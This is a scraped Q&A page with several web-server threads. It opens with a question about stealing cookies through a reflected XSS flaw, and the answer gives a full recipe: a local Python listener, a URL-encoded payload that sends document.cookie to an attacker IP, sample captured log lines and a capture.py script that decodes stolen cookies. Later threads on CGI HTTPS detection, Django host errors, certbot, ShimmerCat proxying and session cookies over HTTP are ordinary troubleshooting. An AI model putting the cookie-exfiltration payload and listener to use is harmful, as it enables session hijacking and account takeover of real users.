XSS Attack without Web Hosting - xss

I am learning about XSS attacks.
Suppose I have a website (let's call it http://www.animallover.com) which allows me to enter anything into a search bar to search for animal names. The website is vulnerable, as entering <script>alert(1)</script> into the search bar triggers an alert.
My goal is to steal the user's cookie by asking the user to visit http://www.animallover.com.
I don't have a web server to host my cookie-capture script.
What should I do?

You can set up an HTTP server on your own computer quite easily.
For example, Python 3 supports the following one-liner HTTP server:
python -m http.server 8000
This will respond to HTTP requests arriving at port 8000 on your system. Bear in mind that you might need to adjust your firewall and set up port forwarding on your router to allow traffic through to this port. And make sure you enter this command inside an empty folder, as everything inside it will be published on the internet.
All incoming requests will be logged to the command-line terminal. So if you're trying to fetch an admin's cookie value, you could craft a link like this (I'm assuming here that your public IP address is 12.34.56.78; you can find the real value by searching "what is my IP"):
http://www.animallover.com/search?q=%3Cscript%3Elocation.href%3D%27http%3A%2F%2F12.34.56.78%3A8000%2F%3F%27%2Bbtoa%28document.cookie%29%3B%3C%2Fscript%3E
This will run the following script in the victim's browser when they open the link:
<script>location.href='http://12.34.56.78:8000/?'+btoa(document.cookie);</script>
The cookie value will be base64 encoded, so you'll need to decode that when it arrives. The log output will look something like this:
$ python -m http.server 8000
99.99.99.99 - - [01/Jan/2021 01:23:45] "GET /?dXNlcj1hZG1pbjsgc2Vzc2lvbl9pZD0xMjM0NTY3OAo= HTTP/1.1" 200 -
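If you'd rather not decode the base64 value by hand each time, a small custom server can decode it as requests arrive. This is only a minimal sketch using the Python standard library, listening on the same port 8000 assumed above:

# capture.py - minimal sketch: log requests and decode the base64-encoded cookie value
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse

class CaptureHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # the exfiltrated cookie arrives as the base64-encoded query string
        encoded = urlparse(self.path).query
        if encoded:
            try:
                print("cookie:", base64.b64decode(encoded).decode(errors="replace"))
            except Exception:
                print("could not decode:", encoded)
        self.send_response(200)
        self.end_headers()

HTTPServer(("", 8000), CaptureHandler).serve_forever()

Run it with python capture.py and point the injected script at the same port as before; the request line is still logged, and the decoded cookie is printed next to it.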

Related

How to use CGI to Determine if URL Request is using HTTPS?

I am trying to switch our site from HTTP to HTTPS. In some scenarios we need the site to use HTTP, and at other times HTTPS. I intend to use CGI to determine whether the request is HTTP or HTTPS.
As far as I can tell, the JSON requests must match the protocol of the original request. If you request http://example.org, you must call the JSON with http://example.org/file.json. If you request https://example.org/, you must call the JSON with https://example.org/file.json.
Normally, I would use CGI variables to tell me whether the request is HTTP or HTTPS. I can test CGI.HTTPS to see if it is on or off. I can check CGI.SERVER_PORT to see if it is 80 or 443. I can check CGI.SERVER_PORT_SECURE to see if it is 0 or 1.
When I view our web site in every browser, I can dump the CGI variables and get what I expect 100% of the time.
When a few other people in our office and outside our office make the same request, they get CGI variable values that suggest their request is NOT secure. CGI.HTTPS will show off. CGI.SERVER_PORT will show 80. CGI.SERVER_PORT_SECURE will show 0. Every other indicator shows that the site is secure in every browser, but the CGI variable values say it's not secure.
The site behaves flawlessly 100% for everyone for dev and stage. Only in live, which is behind a load balancer, does this issue exist (for some people).
Is this a load balancer issue? Is this certificate settings issue? Why are my CGI variables lying to me? How can I work around this issue?
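For reference, the kind of check described above looks roughly like this as a Python CGI sketch (the HTTPS and SERVER_PORT variables are standard CGI; whether your load balancer sets an X-Forwarded-Proto header is an assumption you would need to verify, but it is typically that header that still reflects the client's original scheme when TLS is terminated at the balancer):

#!/usr/bin/env python3
# CGI sketch: decide whether the original request used HTTPS.
# Behind a load balancer that terminates TLS, HTTPS/SERVER_PORT describe the
# balancer-to-server hop, so they can report "not secure" even for HTTPS clients;
# X-Forwarded-Proto (if the balancer sets it) reflects the client's original scheme.
import os

def request_is_https(env=os.environ):
    if env.get("HTTP_X_FORWARDED_PROTO", "").lower() == "https":
        return True
    if env.get("HTTPS", "").lower() == "on":
        return True
    return env.get("SERVER_PORT") == "443"

print("Content-Type: text/plain")
print()
print("secure" if request_is_https() else "not secure")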

Prevent suspicious actions in Django

I have the following suspicious entries in my Django output logs. Is somebody doing a vulnerability scan, or what?
Invalid HTTP_HOST header: '47.95.231.250:58204'. You may need to add '47.95.231.250' to ALLOWED_HOSTS.
[03/Dec/2017 20:09:28] "GET http://47.95.231.250:58204/ip_js.php?IP=my_ip&DK=my_port&DD=FOQGCINPZHEHIIFR HTTP/1.0" 400 62446
How can I prevent this? I tried blocking the IP 47.95.231.250, but that didn't help; the requests are probably coming from different IP addresses.
Check your server - you will very likely find that 47.95.231.250 is your own server's IP address! This error indicates that someone is able to reach your server, but that your Django application is not configured to respond to requests addressed by IP. If everything else is working, then you actually have ALLOWED_HOSTS set correctly based on domain name. Do NOT add the IP address to your ALLOWED_HOSTS unless you actually want to access the site by IP address, which is usually not necessary in a production system.
So access by IP address is an indication of someone trying to get in who shouldn't be allowed. The port 58204 is also a clue. Regular ports for most web servers are 80 & 443. Occasionally, in order to have alternate ports for different applications, you will see 8000 or 8080 or other numbers. 58204 is not a typical web-site port number. The third clue is that the requested file is ip_js.php, which indicates a request aimed at a PHP-based web site and not Django/Python.
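For illustration, the ALLOWED_HOSTS configuration described above would normally look something like this in settings.py (the domain names here are placeholders):

# settings.py (sketch) - list only the hostnames you actually serve
ALLOWED_HOSTS = ["www.example.com", "example.com"]
# Do not add the raw server IP unless you really want the site reachable by IP.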
Bottom line: See if you can configure your firewall to allow ONLY the necessary open ports from the outside world in to your server. Typically this will include:
80 - http
443 - https
22 - ssh
and possibly others depending on how your server is configured and what applications it runs. For example, if you host MySQL or another database on the same box then you will need to open additional ports if-and-only-if you require remote access to the database outside of the application.

Incorrect validation on ssl

I was trying to set up SSL using certbot. My web server is nginx. When I run the command "sudo ./certbot-auto certonly" I enter my domain, which I purchased through Netfirms. The domain is pointed to my Amazon EC2 instance (public IP). I get this error: "Type: unauthorized. Detail: Incorrect validation certificate for TLS-SNI-01 challenge." Why is this happening?
I'm assuming it's the apache plugin that you are using.
The way the apache plugin works is that it adds a temporary VirtualHost with a "fake" certificate and SNI hostname that solves the TLS-SNI-01 challenge. Since this server has multiple IP addresses, I'm not certain whether the apache plugin is capable of determining the correct IP address to listen on for this temporary VirtualHost. I haven't seen any success stories that explicitly mention this scenario, at least.
Your best bet might be to switch to the webroot plugin, which works by writing files to your existing DocumentRoot. If you'd like to continue using the automatic apache configuration while using the webroot authenticator, try something like this:
./certbot-auto --authenticator webroot --installer apache -w /var/www/html -d example.com
I had a similar problem - only when trying to update an existing key.
What I noticed was that the validation error said it found a certificate that had all the other domain names in it that I had already requested in a certificate before.
Why does the validator see the previous certificate?
From the logs it seems to set up a new VirtualHost for each domain in the new cert in order to verify that the server is the one pointed to by the DNS. Validation requests to these mini VirtualHosts cannot be working correctly if the validator is seeing the existing cert with every domain in it - I thought "my VirtualHost setup is somehow causing a problem!"
I thought maybe, because I have a wildcard in my VirtualHost, it is somehow getting picked up before the mini temporary VirtualHosts.
I had named my existing hosts with 3 digit numeric prefixes so that I could carefully order them given that Apache said it processes .conf files in alphabetical order. This would mean they would get processed BEFORE any other .conf files starting with a letter.
I renamed my .conf files by adding a 'c' prefix before the number, and now it appears as though it's working, because it got past the verification phase at least - except now I have exceeded my 20 key requests for the week, so I can't complete the process just yet!! Doh!

ShimmerCat with reverse proxy when using "the old way"

I have used ShimmerCat with sc-tool to connect to my development sites as described here, and everything has always worked like a charm with it, but I also wanted to follow the "old way" of configuring my /etc/hosts. In this case I had a small problem: the server ran OK, and I could access my development site (let's say I used https://www.example.com:4043/), but I'm also using a reverse proxy as described in this article and in the config file reference. It redirects to a Django app I'm using. Let's say this is my devlove.yaml config file:
---
shimmercat-devlove:
    domains:
        www.example.com:
            root-dir: site
            consultant: 8080
            cache-key: xxxxxxx
        api.example.com:
            port: 8080
The problem is that when I try to access a URL that calls the API, a 404 response is sent back from the API. Let me try to explain it through an example. I try to access https://www.example.com:4043/country/, and on this page I make a request to the API: /api/<country>/towns/. The API endpoint then returns a 404 response, so it is not finding this URL, which does not happen when using Google Chrome with sc-tool. I have set both domains, www.example.com and api.example.com, in my /etc/hosts. I have been trying to solve it, but without any luck; is there something I'm missing? Any help will be welcome. Thanks in advance.
With a bit more data, we may be able to find the issue. In the meantime, here is a list of troubleshooting tips:
Possible issue: DNS is cached in browser, /etc/hosts is not being used (yet)
This can happen if your browser has not done a DNS lookup since before you changed your /etc/hosts file. Then the connection is going to a domain on the Internet that may not have the API endpoint that you are calling.
Troubleshooting: Check ShimmerCat's log for the requests. If this is the issue, closing and opening the browser may solve the issue.
Possible issue: the host header is incorrect
ShimmerCat uses the Host header in HTTP/1.1 requests and the :authority header in HTTP/2 requests to distinguish the domains. It always discards any port number present in them. If these headers are not set, or are set to a domain other than the ones ShimmerCat is configured to listen for, the server will consider the situation so despicable that it will just close the connection.
Troubleshooting: This is not a 404 error, but a connection close (if trying to connect un-proxied, directly to the SSL port where ShimmerCat is listening), or a "Socks Connection Failed" (if trying to connect through ShimmerCat's built-in SOCKS5 proxy). In the former case, the server will print the message "Rejected request to Just https://some-domain-or-ip/some/path" in its log, using the actual value for the domain, or "Rejected request to Nothing" if no header was present. The second case is more complicated, because the SOCKS5 proxy step happens before the HTTP routing algorithm.
In any case, the browser will put a red line in the network panel of the developer tools. If you are accessing the server using curl, like this:
curl -k -H host:api.incorrect-domain.com https://127.0.0.1:4043/contents/blog/data-density/
or like
curl -k --http2 -H host:api.incorrect-domain.com https://127.0.0.1:4043/contents/blog/data-density/
(notice the --http2 parameter in the second form), you will get a response:
curl: (56) Unexpected EOF
Extra-tip: There is a field for the network address in the browser's developer tools. Check it, it may tell you something!
Possible issue: something gets messed up when passing the request to the api back-end.
API backends are also sensitive to the host header, and to additional things like authentication cookies and request parameters.
Troubleshooting: A way to diagnose things is to invoke ShimmerCat using the --show-proxied-headers command-line option. It makes ShimmerCat report the proxied headers in the log:
Issuing request with headers :authority: api.example.com
:method: GET
:path: /my/api/endpoint/path/
:scheme: https
accept: */*
user-agent: curl/7.47.0
Possible issue: there are two instances or more of ShimmerCat running
...and they are using different configurations. ShimmerCat uses port sharing among several processes to increase availability. A downside of this is that it is perfectly possible to mistakenly start ShimmerCat, forget to stop it, and start it again after changing some bit of configuration. The two instances will be running at the same time, and either of them may pick up connections made to the listening port.
Troubleshooting: Shut down all instances of ShimmerCat, then double-check there are none running by using the corresponding form of the ps command, and start the server with the configuration you want.

Django+apache: HTTPS only for login page

I'm trying to accomplish the following behaviour:
When the user accesses the site via:
http://example.com/
I want him to be redirected to:
https://example.com/
Via middleware, if the user is not logged in, the login template is rendered when accessing /. If the user is logged in, / is the main view. Once the user has logged in, I want the site to work over HTTP.
To do so, I am running the same server on ports 80 and 443 (is this really necessary? I have the impression that I'm running two separate servers with the same application, while I want a single server listening on two ports).
When the user navigates away from the login page, due to the redirection to the HTTP server the data in request.session is not present (although it is present over HTTPS), so it looks as if no user is logged in. So, assuming the Apache setup is correct (running the same server on two different ports), I guess I have to pass the cookie from the server running on HTTPS over to HTTP.
Can anybody shed some light on this? Thank you
First off, make sure that the setting SESSION_COOKIE_SECURE is set to False. As long as the domains are the same, the cookies in the browser should be present, and so the session information should still be there.
Take a look at your cookies using a plugin. Search for the session cookie you have set. By default these cookies are named "sessionid" by Django. Make sure the domains and paths are in fact correct for both the secure session and regular session.
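For reference, the settings mentioned above live in settings.py; a minimal sketch (these are Django's actual setting names, with their usual defaults noted) would be:

# settings.py (sketch)
SESSION_COOKIE_SECURE = False      # allow the session cookie to be sent over plain HTTP
SESSION_COOKIE_NAME = "sessionid"  # Django's default cookie name
SESSION_COOKIE_DOMAIN = None       # default: scope the cookie to the exact host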
I want to warn against this, however. Recently, things like Firesheep have exploited an issue that people have known about but ignored for a long time: these cookies are not secure in any way. It would be easy for someone to "sniff" the cookie over the HTTP connection and gain access to the site as your logged-in user. This essentially eliminates the entire reason you set up a secure connection to log in in the first place.
Is there a reason you don't have a secure connection across the entire site? Traditional arguments about it being more intensive on the server really don't apply with modern CPUs any longer and the exploits that I refer to above are becoming so prevalent that the marginal (really marginal) cost of encrypting all of your traffic is well worth it.
Apache needs to run essentially 2 different servers because a.) it is listening on 2 different ports and b.) one is adding some additional encryption logic. That said, this is a normal thing for Apache. I run servers with dozens of "servers" running on different ports and doing different logic. In the grand scheme of things, this shouldn't really weigh your server down.
That said, once you pass the request on to *WSGI or mod_python, you will then have to have logic to make sure that no one tries to log in over your non-encrypted connection, because the only difference visible to Django will be the return value of request.is_secure(). All the URLs and views in your urlconf will be accessible over both connections.
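As a sketch of that kind of check (the /login/ path and the class name are illustrative, not taken from the question), a small piece of middleware could bounce any plain-HTTP attempt to reach the login page back to HTTPS:

# middleware sketch (illustrative): force the login URL onto HTTPS
from django.http import HttpResponsePermanentRedirect

class LoginRequiresHTTPSMiddleware:
    def __init__(self, get_response):
        self.get_response = get_response

    def __call__(self, request):
        # request.is_secure() is the only hint Django gets about the original scheme
        if request.path == "/login/" and not request.is_secure():
            host = request.get_host().split(":")[0]  # drop any explicit port
            return HttpResponsePermanentRedirect("https://" + host + request.get_full_path())
        return self.get_response(request)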
Whew that is a lot. I hope that helps.